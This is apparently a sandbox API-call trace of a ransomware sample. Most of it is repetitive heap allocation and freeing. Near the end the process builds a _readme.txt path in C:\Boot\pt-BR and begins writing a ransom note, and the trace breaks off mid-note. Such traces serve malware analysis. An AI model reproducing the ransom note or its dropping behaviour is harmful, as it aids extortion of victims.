(HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.143] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0184.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.143] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.143] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.143] PathFindFileNameW (pszPath="") returned="" [0184.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.144] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.144] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0184.144] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0184.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.144] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.144] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.145] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0184.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.145] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents 